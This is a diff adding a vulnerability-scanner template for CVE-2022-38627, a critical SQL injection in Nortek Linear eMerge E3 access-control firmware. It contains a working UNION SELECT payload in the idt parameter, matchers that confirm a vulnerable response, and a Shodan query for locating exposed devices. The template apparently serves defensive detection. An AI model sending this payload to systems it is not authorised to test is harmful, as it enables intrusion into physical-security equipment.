Add CVE-2022-38627 (vKEV)

http/cves/2022/CVE-2022-38627.yaml

@@ -0,0 +1,44 @@
+id: CVE-2022-38627
+
+info:
+  name: Nortek Linear eMerge E3-Series - SQL Injection
+  author: daffainfo,omarhashem666
+  severity: critical
+  description: |
+    Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a SQL injection vulnerability via the idt parameter.
+  reference:
+    - https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-38627
+    - https://omar0x01.medium.com/15cebd072ed6
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-38627
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-38627
+    cwe-id: CWE-89
+    cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: nortekcontrol
+    product: emerge_e3_firmware
+    shodan-query:
+      - http.title:"Linear eMerge"
+  tags: cve,cve2022,emerge,nortek,linear,sqli,vkev
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27{{randstr}}%27||%27CVE%27||(7*7*7*7)||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '{{randstr}}CVE24010\.[0-9]+-[0-9]+[a-z]+'
+
+      - type: word
+        part: body
+        words:
+          - "Print Badge"
+          - "btnPrint"
+        condition: and